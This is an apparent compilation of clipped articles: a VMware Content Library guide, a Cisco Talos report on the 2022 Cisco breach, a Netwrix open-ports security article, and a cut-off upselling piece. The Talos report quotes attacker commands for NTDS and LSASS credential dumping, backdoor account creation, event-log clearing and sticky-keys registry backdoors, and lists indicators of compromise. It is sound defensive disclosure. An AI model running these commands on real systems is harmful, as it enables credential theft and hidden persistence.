If you navigate to the Inventory view in the vSphere Client, you will see the machine has a tiny blue dot in the lower left-hand corner of the virtual machine icon.

Viewing the checked-out VM template as a virtual machine in vSphere inventory

After making one small change, such as changing the virtual network the virtual machine is connected to, we see the option appear to Check In VM to Template.

Check In VM to Template

It will bring up the Check In VM dialog box, allowing you to enter notes and then click the Check In button.

Check In the VM

We see the audit trail of changes reflected in the Content Library with the notes we entered in the Check in notes.

Virtual machine template checked back in with the notes entered in the check-in process

You will also see a new Versioning tab displayed when you view the virtual machine template in the inventory view.

Viewing the versioning of a virtual machine template in the inventory view

VMware Content Library Roles

There are various privileges related to Content Library privileges. VMware documents the following privileges that can be assigned to a custom VMware Content Library Role.

Privilege Name	Description	Required On
Content library.Add library item	Allows addition of items in a library.	Library
Content library.Add root certificate to trust store	Allows addition of root certificates to the Trusted Root Certificates Store.	vCenter Server
Content library.Check in a template	Allows checking in of templates.	Library
Content library.Check out a template	Allows checking out of templates.	Library
Content library.Create a subscription for a published library	Allows creation of a library subscription.	Library
Content library.Create local library	Allows creation of local libraries on the specified vCenter Server system.	vCenter Server
Content library.Create or delete a Harbor registry	Allows creation or deletion of the VMware Tanzu Harbor Registry service.	vCenter Server for creation. Registry for deletion.
Content library.Create subscribed library	Allows creation of subscribed libraries.	vCenter Server
Content library.Create, delete or purge a Harbor registry project	Allows creation, deletion, or purging of VMware Tanzu Harbor Registry projects.	Registry
Content library.Delete library item	Allows deletion of library items.	Library. Set this permission to propagate to all library items.
Content library.Delete local library	Allows deletion of a local library.	Library
Content library.Delete root certificate from trust store	Allows deletion of root certificates from the Trusted Root Certificates Store.	vCenter Server
Content library.Delete subscribed library	Allows deletion of a subscribed library.	Library
Content library.Delete subscription of a published library	Allows deletion of a subscription to a library.	Library
Content library.Download files	Allows download of files from the content library.	Library
Content library.Evict library item	Allows eviction of items. The content of a subscribed library can be cached or not cached. If the content is cached, you can release a library item by evicting it if you have this privilege.	Library. Set this permission to propagate to all library items.
Content library.Evict subscribed library	Allows eviction of a subscribed library. The content of a subscribed library can be cached or not cached. If the content is cached, you can release a library by evicting it if you have this privilege.	Library
Content library.Import Storage	Allows a user to import a library item if the source file URL starts with ds:// or file://. This privilege is disabled for content library administrator by default. Because an import from a storage URL implies import of content, enable this privilege only if necessary and if no security concern exists for the user who performs the import.	Library
Content library.Manage Harbor registry resources on specified compute resource	Allows management of VMware Tanzu Harbor Registry resources.	Compute cluster
Content library.Probe subscription information	This privilege allows solution users and APIs to probe a remote library’s subscription info including URL, SSL certificate, and password. The resulting structure describes whether the subscription configuration is successful or whether there are problems such as SSL errors.	Library
Content library.Publish a library item to its subscribers	Allows publication of library items to subscribers.	Library. Set this permission to propagate to all library items.
Content library.Publish a library to its subscribers	Allows publication of libraries to subscribers.	Library
Content library.Read storage	Allows reading of content library storage.	Library
Content library.Sync library item	Allows synchronization of library items.	Library. Set this permission to propagate to all library items.
Content library.Sync subscribed library	Allows synchronization of subscribed libraries.	Library
Content library.Type introspection	Allows a solution user or API to introspect the type support plug-ins for the content library service.	Library
Content library.Update configuration settings	Allows you to update the configuration settings.	Library
No vSphere Client user interface elements are associated with this privilege.
Content library.Update files	Allows you to upload content into the content library. Also allows you to remove files from a library item.	Library
Content library.Update library	Allows updates to the content library.	Library
Content library.Update library item	Allows updates to library items.	Library. Set this permission to propagate to all library items.
Content library.Update local library	Allows updates of local libraries.	Library
Content library.Update subscribed library	Allows you to update the properties of a subscribed library.	Library
Content library.Update subscription of a published library	Allows updates of subscription parameters. Users can update parameters such as the subscribed library’s vCenter Server instance specification and placement of its virtual machine template items.	Library
Content library.View configuration settings	Allows you to view the configuration settings.	Library
No vSphere Client user interface elements are associated with this privilege.

Advanced Content Library settings

Several advanced configuration settings are configurable with the VMware Content Library. You can get to these by navigating to Content Libraries > Advanced.

Content Library advanced settings

These include the following settings as detailed by VMware:

Configuration Parameter	Description
Library Auto Sync Enabled	This setting enables automatic synchronization of subscribed content libraries.
Library Auto Sync Refresh Interval (minutes)	The Interval between two consequent automatic synchronizations of the subscribed content library. This interval is measured in minutes.
Library Auto Sync Setting Refresh Interval (seconds)	This is the Interval after which the refresh interval for the automatic synchronization settings of the subscribed library will be updated if it has been changed. It is measured in seconds. A change in the refresh interval requires a restart of vCenter Server.
Library Auto Sync Start Hour	This setting refers to the time of day when the automatic synchronization of a subscribed content library begins
Library Auto Sync Stop Hour	This setting refers to the time of day when the automatic synchronization of a subscribed content library stops. Automatic synchronization stops until the start hour.
Library Maximum Concurrent Sync Items	The maximum number of items concurrently synchronizing for each subscribed library.
Max concurrent NFC transfers per ESX host	The maximum concurrent NFC transfers per ESXi host limit
Maximum Bandwidth Consumption	The bandwidth usage threshold. It is measured in Mbps across all transfers where 0 means unlimited bandwidth.
Maximum Number of Concurrent Priority Transfers	The Concurrent transfer limit for priority files. Tranfers are queued if the bandwidth limit is exceeded. This threadpool is used only to transfer priority objects. For example, if you change the concurrent transfer limit for priority files, such as OVF, you must restart vCenter Server.
Maximum Number of Concurrent Transfers	Concurrent transfer limit. When exceeded, the transfers are queued. If you change the concurrent transfer limit, it requires a restart of vCenter Server.

To properly protect your VMware environment, use Altaro VM Backup to securely backup and replicate your virtual machines. We work hard perpetually to give our customers confidence in their VMware backup strategy.

To keep up to date with the latest VMware best practices, become a member of the VMware DOJO now (it’s free).

Wrapping up

The VMware Content Library provides a centralized repository that allows keeping required file resources, virtual machine templates, ISO images vApps, and other files synchronized and available across the vSphere datacenter. In vSphere 7, the Content Library allows organizations to have a better way to keep up with and track changes to virtual machine templates. Using the new check-in/check-out process, VI admins can track changes made with each check-out and ensure these are documented and synchronized back to the Content Library.

It effectively provides a solution to remove the need to copy files between ESXi hosts or vSphere clusters and have what you need to install guest operating systems or deploy virtual machine templates. In addition, the subscribed Content Library allows synchronizing vCenter Server content libraries so that many other vCenter Servers can take advantage of the files already organized in the published Content Library.

The VMware Content Library is one of the more underutilized tools in the VI admin’s toolbelt that can bring about advantages in workflow, efficiency, and time spent finding and organizing files for deploying VMs and OS’es. In addition, the recent feature additions and improvements, such as check-ins/check-outs, have provided a more DevOps approach to tracking and working with deployment resources.

Source :
https://www.altaro.com/vmware/vmware-content-library/

Cisco Talos shares insights related to recent cyber attack on Cisco

UPDATE HISTORY

DATE	DESCRIPTION OF UPDATES
Aug. 10th 2022	Adding clarifying details on activity involving active directory.
Aug. 10th 2022	Update made to the Cisco Response and Recommendations section related to MFA.

EXECUTIVE SUMMARY

On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate.
During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized.
The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user.
CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc.
After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment.
The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful.
We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
For further information see the Cisco Response page here.

INITIAL VECTOR

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka “vishing”) and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

POST-COMPROMISE TTPS

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:

powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q

They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.

C:\Windows\system32\net user z Lh199211* /add

C:\Windows\system32\net localgroup administrators z /add

This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.

reg save hklm\system system

reg save hklm\sam sam

reg save HKLM\security sec

On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.

tasklist | findstr lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full

The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.

wevtutil.exe el

wevtutil.exe cl [LOGNAME]

In many cases, we observed the attacker removing the previously created local administrator account.

net user z /delete

To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.

netsh advfirewall firewall set rule group=remote desktop new enable=Yes

We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn.

C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi

The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f

This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

BACKDOOR ANALYSIS

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:

/bot/cmd.php?botid=%.8x

The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:

/bot/gate.php?botid=%.8x

Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.

The aforementioned HTTP requests are sent using the following user-agent string:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33

The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:

C:\users\public\win\cmd.exe

The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

ATTACK ATTRIBUTION

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations.

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments.

CISCO RESPONSE AND RECOMMENDATIONS

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.

Win.Exploit.Kolobko-9950675-0
Win.Backdoor.Kolobko-9950676-0

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information.

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious.

For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.

Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack.

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.

MITRE ATT&CK MAPPING

All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred.

INDICATORS OF COMPROMISE

The following indicators of compromise were observed associated with this attack.

Hashes (SHA256)

184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3

2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03

542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d

61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610

753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647

8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a

8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190

99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f

bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7

eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18

IP Addresses

104.131.30[.]201

108.191.224[.]47

131.150.216[.]118

134.209.88[.]140

138.68.227[.]71

139.177.192[.]145

139.60.160[.]20

139.60.161[.]99

143.198.110[.]248

143.198.131[.]210

159.65.246[.]188

161.35.137[.]163

162.33.177[.]27

162.33.178[.]244

162.33.179[.]17

165.227.219[.]211

165.227.23[.]218

165.232.154[.]73

166.205.190[.]23

167.99.160[.]91

172.56.42[.]39

172.58.220[.]52

172.58.239[.]34

174.205.239[.]164

176.59.109[.]115

178.128.171[.]206

185.220.100[.]244

185.220.101[.]10

185.220.101[.]13

185.220.101[.]15

185.220.101[.]16

185.220.101[.]2

185.220.101[.]20

185.220.101[.]34

185.220.101[.]45

185.220.101[.]6

185.220.101[.]65

185.220.101[.]73

185.220.101[.]79

185.220.102[.]242

185.220.102[.]250

192.241.133[.]130

194.165.16[.]98

195.149.87[.]136

24.6.144[.]43

45.145.67[.]170

45.227.255[.]215

45.32.141[.]138

45.32.228[.]189

45.32.228[.]190

45.55.36[.]143

45.61.136[.]207

45.61.136[.]5

45.61.136[.]83

46.161.27[.]117

5.165.200[.]7

52.154.0[.]241

64.227.0[.]177

64.4.238[.]56

65.188.102[.]43

66.42.97[.]210

67.171.114[.]251

68.183.200[.]63

68.46.232[.]60

73.153.192[.]98

74.119.194[.]203

74.119.194[.]4

76.22.236[.]142

82.116.32[.]77

87.251.67[.]41

94.142.241[.]194

Domains

cisco-help[.]cf

cisco-helpdesk[.]cf

ciscovpn1[.]com

ciscovpn2[.]com

ciscovpn3[.]com

devcisco[.]com

devciscoprograms[.]com

helpzonecisco[.]com

kazaboldu[.]net

mycisco[.]cf

mycisco[.]gq

mycisco-helpdesk[.]ml

primecisco[.]com

pwresetcisco[.]com

Email Addresses

costacancordia[@]protonmail[.]com

POSTED BY NICK BIASINI AT 3:30 PM

Source :
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

Open Port Vulnerabilities List

Insufficiently protected open ports can put your IT environment at serious risk. Threat actors often seek to exploit open ports and their applications through spoofing, credential sniffing and other techniques. For example, in 2017, cybercriminals spread WannaCry ransomware by exploiting an SMB vulnerability on port 445. Other examples include the ongoing campaigns targeting Microsoft’s Remote Desktop Protocol (RDP) service running on port 3389.

Handpicked related content:

[Free Guide] Network Security Best Practices

Read on to learn more about the security risks linked to ports, vulnerable ports that need your attention and ways to enhance the security of open ports.

A Refresher on Ports

Ports are logical constructs that identify a specific type of network service. Each port is linked to a specific protocol, program or service, and has a port number for identification purposes. For instance, secured Hypertext Transfer Protocol (HTTPS) messages always go to port 443 on the server side, while port 1194 is exclusively for OpenVPN.

The most common transport protocols that have port numbers are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is a connection-oriented protocol with built-in re-transmission and error recovery. UDP is a connectionless protocol that doesn’t recover or correct errors in messages; it’s faster and has less network overhead traffic than TCP. Both TCP and UDP sit at the transport layer of the TCP/IP stack and use the IP protocol to address and route data on the internet. Software and services are designed to use TCP or UDP, depending on their requirements.

TCP and UDP ports are in one of these three states:

Open — The port responds to connection requests.
Closed — The port is unreachable, indicating that there is no corresponding service running.
Filtered — The firewall is monitoring traffic and blocking certain connection requests to the port.

Security Risks Linked to Ports

Numerous incidents have demonstrated that open ports are most vulnerable to attack when the services listening to them are unpatched or insufficiently protected or misconfigured, which can lead to compromised systems and networks. In these cases, threat actors can use open ports to perform various cyberattacks that exploit the lack of authentication mechanisms in the TCP and UDP protocols. One common example is spoofing, where a malicious actor impersonates a system or a service and sends malicious packets, often in combination with IP spoofing and man-in-the-middle-attacks. The campaign against RDP Pipe Plumbing is one of the latest to employ such a tactic. In addition, ports that have been opened on purpose (for instance, on a web server) can be attacked via that port using application-layer attacks such as SQL injection, cross-site request forgery and directory traversal.

Another common technique is the denial of service (DoS) attack, most frequently used in the form of distributed denial of service (DDoS), where attackers send massive numbers of connection requests from various machine to the service on the target in order to deplete its resources.

Vulnerable Ports that Need Your Attention

Any port can be targeted by threat actors, but some are more likely to fall prey to cyberattacks because they commonly have serious shortcomings, such as application vulnerabilities, lack of two-factor authentication and weak credentials.

Here are the most vulnerable ports regularly used in attacks:

Ports 20 and 21 (FTP)

Port 20 and (mainly) port 21 are File Transfer Protocol (FTP) ports that let users send and receive files from servers.

FTP is known for being outdated and insecure. As such, attackers frequently exploit it through:

Brute-forcing passwords
Anonymous authentication (it’s possible to log into the FTP port with “anonymous” as the username and password)
Cross-site scripting
Directory traversal attacks

Port 22 (SSH)

Port 22 is for Secure Shell (SSH). It’s a TCP port for ensuring secure access to servers. Hackers can exploit port 22 by using leaked SSH keys or brute-forcing credentials.

Port 23 (Telnet)

Port 23 is a TCP protocol that connects users to remote computers. For the most part, Telnet has been superseded by SSH, but it’s still used by some websites. Since it’s outdated and insecure, it’s vulnerable to many attacks, including credential brute-forcing, spoofing and credential sniffing.

Port 25 (SMTP)

Port 25 is a Simple Mail Transfer Protocol (SMTP) port for receiving and sending emails. Without proper configuration and protection, this TCP port is vulnerable to spoofing and spamming.

Port 53 (DNS)

Port 53 is for Domain Name System (DNS). It’s a UDP and TCP port for queries and transfers, respectively. This port is particularly vulnerable to DDoS attacks.

Ports 137 and 139 (NetBIOS over TCP) and 445 (SMB)

Server Message Block (SMB) uses port 445 directly and ports 137 and 139 indirectly. Cybercriminals can exploit these ports through:

Using the EternalBlue exploit, which takes advantage of SMBv1 vulnerabilities in older versions of Microsoft computers (hackers used EternalBlue on the SMB port to spread WannaCry ransomware in 2017)
Capturing NTLM hashes
Brute-forcing SMB login credentials

Ports 80, 443, 8080 and 8443 (HTTP and HTTPS)

HTTP and HTTPS are the hottest protocols on the internet, so they’re often targeted by attackers. They’re especially vulnerable to cross-site scripting, SQL injections, cross-site request forgeries and DDoS attacks.

Ports 1433,1434 and 3306 (Used by Databases)

These are the default ports for SQL Server and MySQL. They are used to distribute malware or are directly attacked in DDoS scenarios. Quite often, attackers probe these ports to find unprotected database with exploitable default configurations.

Port 3389 (Remote Desktop)

This port is used in conjunction with various vulnerabilities in remote desktop protocols and to probe for leaked or weak user authentication. Remote desktop vulnerabilities are currently the most-used attack type; one example is the BlueKeep vulnerability.

Tips for Strengthening the Security of Open Ports

Luckily, there are ways to enhance the security of open ports. We highly recommend the following six strategies:

1. Patch firewalls regularly.

Your firewall is the gatekeeper to all the other systems and services in your network. Patching keeps your firewalls up to date and repairs vulnerabilities and flaws in your firewall system that cybercriminals could use to gain full access to your systems and data.

2. Check ports regularly.

You should also regularly scan and check your ports. There are three main ways to do this:

Command-line tools — If you have the time to scan and check ports manually, use command-line tools to spot and scan open ports. Examples include Netstat and Network Mapper, both of which can be installed on a wide range of operating systems, including Windows and Linux.
Port scanners — If you want faster results, consider using a port scanner. It’s a computer program that checks if ports are open, closed or filtered. The process is simple: The scanner transmits a network request to connect to a specific port and captures the response.
Vulnerability scanning tools — Solutions of this type can also be used to discover ports that are open or configured with default passwords.

Track service configuration changes.

Many services on your network connect to various ports, so it is important to monitor the running states of installed services and continuously track changes to service configuration settings. Services can be vulnerable when they are unpatched or misconfigured.

Using Netwrix Change Tracker, you can harden your systems by tracking unauthorized changes and other suspicious activities. In particular, it provides the following functionality:

Actionable alerting about configuration changes
Automatic recording, analyzing, validating and verifying of every change
Real-time change monitoring
Constant application vulnerability monitoring

4. Use IDP and IPS tools.

Intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help you prevent attackers from exploiting your ports. They monitor your network, spot possible cybersecurity incidents, log information about them and report the incidents to security administrators. IPS complements your firewalls by identifying suspicious incoming traffic and logging and blocking the attack.

5. Use SSH Keys.

Another option is to use SSH keys. These access credentials are more secure than passwords because decrypting SSH is very difficult, if not impossible. There are two types of SSH keys:

Private or identity keys, which identify users and give them access
Public or authorized keys, which determine who can access your system

You can use public-key cryptographic algorithms and key generation tools to create SSH keys.

6. Conduct penetration tests and vulnerability assessments.

Consider conducting penetration tests and vulnerability assessments to protect your ports. Although both of these techniques are used to spot vulnerabilities in IT infrastructure, they are quite different. Vulnerability scans only identify and report vulnerabilities, while penetration tests exploit security gaps to determine how attackers can gain unauthorized access to your system.

FAQs

What is an open port vulnerability?

An open port vulnerability is a security gap caused by an open port. Without proper configuration and protection, attackers can use open ports to access your systems and data.

Which ports are most vulnerable?

Certain ports and their applications are more likely to be targeted because they often have weaker credentials and defenses. Common vulnerable ports include:

FTP (20, 21)
SSH (22)
Telnet (23)
SMTP (25)
DNS (53)
NetBIOS over TCP (137, 139)
SMB (445)
HTTP and HTTPS (80, 443, 8080, 8443)
Ports 1433, 1434 and 3306
Remote desktop (3389)

Is port 80 a security risk?

Port 80 isn’t inherently a security risk. However, if you leave it open and don’t have the proper configurations in place, attackers can easily use it to access your systems and data. Unlike port 443 (HTTPS), port 80 is unencrypted, making it easy for cybercriminals to access, leak and tamper with sensitive data.

Source :
https://blog.netwrix.com/2022/08/04/open-port-vulnerabilities-list/

Upselling vs. cross-selling: What’s the difference?

Upselling and cross-selling are tactics that you can use to sell more, with less—less time, less money, less resources. Simple as that. And both tactics can be applied to virtually every industry: software, retail, finance, telecom, manufacturing, real estate—you name it.

I run Tee Tweets, a clothing brand that lets you wear any tweet in the world, and cross-selling and upselling are two of the most important tactics in my business strategy. Both techniques are designed to get customers to buy more, and since there are hundreds of thousands of tweets generated every minute, I certainly have plenty of products for buyers to add to their cart.

Sell more and keep your customers happy

Automate your eCommerce

Upselling and cross-selling are often confused because, in some ways, they accomplish the same goal of increasing the amount that a customer will buy. But there are distinct differences between the two, and if you can master them, they can both be uniquely instrumental to your business’s success.

What’s the difference?

Both cross-selling and upselling involve convincing an existing customer to increase the amount they’re buying. But here’s the difference:

When you’re cross-selling, you’re working specifically to get the customer to make additional purchases that would go well with what they originally intended to buy.
When you’re upselling, you’re not necessarily suggesting more items, but convincing the customer to buy the bigger, better, and more expensive version of their original purchase.

For example, when I send out marketing or confirmation emails to recent buyers, I make sure to include products that are similar to whatever that recipient bought. Often this results in a new sale, but even when it doesn’t, it still exposes the customer to other products they may not have known existed. That’s cross-selling.

There’s not as much upselling involved in TeeTweets, but I’ve come across plenty of upselling opportunities in my freelance consulting career at Swyftlight. I had one particular client who wanted me to build a simple marketing website, so they gave me their specs and budget and asked me to put together a proposal. I pitched the idea of adding eCommerce capabilities to their site, quoting them a rate that was still within their budget but was more than I would have quoted them for the simple site alone. They took me up on it—I effectively upsold them on a better version of their original product.

Those are two basic examples, but if you really want to make sure you’re capitalizing on every upselling and cross-selling opportunity you encounter, it’s important to understand both tactics in depth.

Graphic illustration visualizing cross-selling and upselling

What is upselling?

Upselling is about upgrading the customer to a bigger or better version of the product or service they’re already buying. Virtually every modern business does some form of upselling, but one of the most common examples can be seen in an industry we all know and love: food.

Think specifically of the fast food industry, where customers are always encouraged to “supersize” the size of an item. Ordering small fries? Make it a large for only an extra 25 cents.

Upselling works in all industries, not just consumer-focused ones. If your business pays for software, for example, you’ve almost definitely seen upselling in action. Let’s take a look at Airtable.

Screenshot of Airtable's pricing structure

Airtable’s pricing structure is laid out in such a way that you can see every plan’s capabilities all in one place. When you’re making your purchase, this page encourages you to stop and wonder: will 5,000 automation runs be enough? Will 5GB hold what I need?

